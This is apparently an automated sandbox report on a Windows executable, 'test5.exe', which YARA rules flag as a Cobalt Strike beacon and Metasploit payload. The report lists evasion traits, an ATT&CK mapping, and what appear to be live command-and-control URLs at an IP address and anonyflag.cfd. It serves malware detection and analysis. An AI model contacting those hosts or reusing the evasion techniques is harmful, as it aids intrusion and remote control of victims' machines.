Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23

Source: test5.exe	Static PE information: Section: /19 ZLIB complexity 0.9990767045454545
Source: test5.exe	Static PE information: Section: /32 ZLIB complexity 0.9969308035714286
Source: test5.exe	Static PE information: Section: /65 ZLIB complexity 1.0000639265719207
Source: test5.exe	Static PE information: Section: /78 ZLIB complexity 0.9962546816479401

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@1/0@1/2

Source: test5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\test5.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: test5.exe

Virustotal: Detection: 6%

Source: test5.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: test5.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: test5.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: test5.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: test5.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: test5.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: test5.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: test5.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: test5.exe	String found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: test5.exe	String found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: test5.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: test5.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: test5.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: test5.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: test5.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: test5.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: test5.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: test5.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: test5.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: test5.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: test5.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: test5.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: test5.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: test5.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: test5.exe	String found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: test5.exe	String found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: test5.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: test5.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: test5.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125resource temporarily unavailablesoftware caused connection abortnumerical argument out of domainMapIter.Value called before Nextsync: Unlock of unlocked RWMutexsync: negative WaitGroup countergo package net: hostLookupOrder(" not supported for cpu option "mime: expected token after slashuse of closed network connectionunexpected character, want colonCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWcrypto/aes: output not full blockslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of range142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangesync: RUnlock of unlocked RWMutexgo package net: confVal.netCgo = GODEBUG: no value specified for "skip everything and stop the walkwaiting for unsupported file typetoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nGODEBUG sys/cpu: can not enable "CM_Get_Device_Interface_List_SizeWSetFileCompletionNotificationModescrypto/aes: invalid buffer overlapillegal base64 data at input byte slice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355621337890625too many references: cannot splicereflect: Field of non-struct ty
Source: test5.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandoned28421709430404007434844970703125resource temporarily unavailablesoftware caused connection abortnumerical argument out of domainMapIter.Value called before Nextsync: Unlock of unlocked RWMutexsync: negative WaitGroup countergo package net: hostLookupOrder(" not supported for cpu option "mime: expected token after slashuse of closed network connectionunexpected character, want colonCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWcrypto/aes: output not full blockslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of range142108547152020037174224853515625710542735760100185871124267578125too many levels of symbolic linksreflect: slice index out of range of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangesync: RUnlock of unlocked RWMutexgo package net: confVal.netCgo = GODEBUG: no value specified for "skip everything and stop the walkwaiting for unsupported file typetoo many Answers to pack (>65535)leafCounts[maxBits][maxBits] != nGODEBUG sys/cpu: can not enable "CM_Get_Device_Interface_List_SizeWSetFileCompletionNotificationModescrypto/aes: invalid buffer overlapillegal base64 data at input byte slice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inconsistent bp entersyscallblock inconsistent sp runtime: g is running but p is notinvalid timer channel: no capacity3552713678800500929355621337890625too many references: cannot splicereflect: Field of non-struct ty
Source: test5.exe	String found in binary or memory: F:/WebSec/GoCode/pkg/mod/golang.org/toolchain@v0.0.1-go1.23.3.windows-amd64/src/net/addrselect.go

Source: C:\Users\user\Desktop\test5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\test5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: test5.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: test5.exe

Static file information: File size 4492800 > 1048576

Source: test5.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x132200
Source: test5.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16f200

Source: test5.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: test5.exe	Static PE information: section name: .xdata
Source: test5.exe	Static PE information: section name: /4
Source: test5.exe	Static PE information: section name: /19
Source: test5.exe	Static PE information: section name: /32
Source: test5.exe	Static PE information: section name: /46
Source: test5.exe	Static PE information: section name: /65
Source: test5.exe	Static PE information: section name: /78
Source: test5.exe	Static PE information: section name: /90
Source: test5.exe	Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_006A54C6 push rsi; retf 002Ch	0_2_006A54C7
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551B0015A push eax; ret	0_2_0000021551B003B6
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551B00327 push eax; ret	0_2_0000021551B003B6
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C1E348 push ebp; iretd	0_2_0000021551C1E34D
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551BFA35D push edi; iretd	0_2_0000021551BFA35E
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551BFBD58 push ebp; iretd	0_2_0000021551BFBD59
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551BFA71E push cs; retf	0_2_0000021551BFA71F
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C19758 push ebp; iretd	0_2_0000021551C19759
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C1970F push ebp; iretd	0_2_0000021551C19710
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021551C1972F push ebp; iretd	0_2_0000021551C19730
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021553749B65 push cs; retf	0_2_0000021553749B66
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021553768B56 push ebp; iretd	0_2_0000021553768B57
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_000002155374B19F push ebp; iretd	0_2_000002155374B1A0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_00000215537497A4 push edi; iretd	0_2_00000215537497A5
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021553768B9F push ebp; iretd	0_2_0000021553768BA0
Source: C:\Users\user\Desktop\test5.exe	Code function: 0_2_0000021553768B76 push ebp; iretd	0_2_0000021553768B77

Source: C:\Users\user\Desktop\test5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\test5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\test5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006F0860 rdtscp

0_2_006F0860

Source: C:\Users\user\Desktop\test5.exe TID: 6560	Thread sleep count: 63 > 30			Jump to behavior
Source: C:\Users\user\Desktop\test5.exe TID: 6560	Thread sleep time: -3780000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\test5.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\test5.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006B1180 GetProcessAffinityMask,GetSystemInfo,

0_2_006B1180

Source: C:\Users\user\Desktop\test5.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1964900061.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079907928.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2002707961.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006F0860 Start: 006F0869 End: 006F087F

0_2_006F0860

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006F0860 rdtscp

0_2_006F0860

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_0000021551C04578 GetUserNameA,strrchr,_snprintf,

0_2_0000021551C04578

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_006B0D80 LoadLibraryExW,LoadLibraryExW,NtCreateWaitCompletionPacket,NtAssociateWaitCompletionPacket,NtCancelWaitCompletionPacket,RtlGetCurrentPeb,RtlGetVersion,

0_2_006B0D80

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Metasploit Payload

Source: Yara match

File source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
test5.exe	7%	Virustotal		Browse
test5.exe	8%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://47.90.135.102/	0%	Avira URL Cloud	safe
https://anonyflag.cfd/yflag.cfd/p	0%	Avira URL Cloud	safe
http://47.90.135.102/2Vcr	0%	Avira URL Cloud	safe
https://anonyflag.cfd/tography	0%	Avira URL Cloud	safe
https://anonyflag.cfd/yflag.cfd/	0%	Avira URL Cloud	safe
https://anonyflag.cfd/~	0%	Avira URL Cloud	safe
https://47.90.135.102/2VcrZ	0%	Avira URL Cloud	safe
https://anonyflag.cfd/cros	0%	Avira URL Cloud	safe
https://anonyflag.cfd/P	0%	Avira URL Cloud	safe
https://anonyflag.cfd/G	0%	Avira URL Cloud	safe
https://anonyflag.cfd/	0%	Avira URL Cloud	safe
https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcno	0%	Avira URL Cloud	safe
https://anonyflag.cfd/7h	0%	Avira URL Cloud	safe
https://anonyflag.cfd/rovider	0%	Avira URL Cloud	safe
https://anonyflag.cfd/yflag.cfd/Y	0%	Avira URL Cloud	safe
https://47.90.135.102/2VcrB	0%	Avira URL Cloud	safe
https://anonyflag.cfd/Y	0%	Avira URL Cloud	safe
https://anonyflag.cfd/iiloksh	0%	Avira URL Cloud	safe
https://anonyflag.cfd/de	0%	Avira URL Cloud	safe
https://47.90.135.102/2Vcr	0%	Avira URL Cloud	safe
http://7.90.135.102:443/2Vcr	0%	Avira URL Cloud	safe
https://anonyflag.cfd/dep	0%	Avira URL Cloud	safe
https://anonyflag.cfd/Kh	0%	Avira URL Cloud	safe
https://anonyflag.cfd/der	0%	Avira URL Cloud	safe
https://anonyflag.cfd/vide	0%	Avira URL Cloud	safe
https://anonyflag.cfd/Kb	0%	Avira URL Cloud	safe
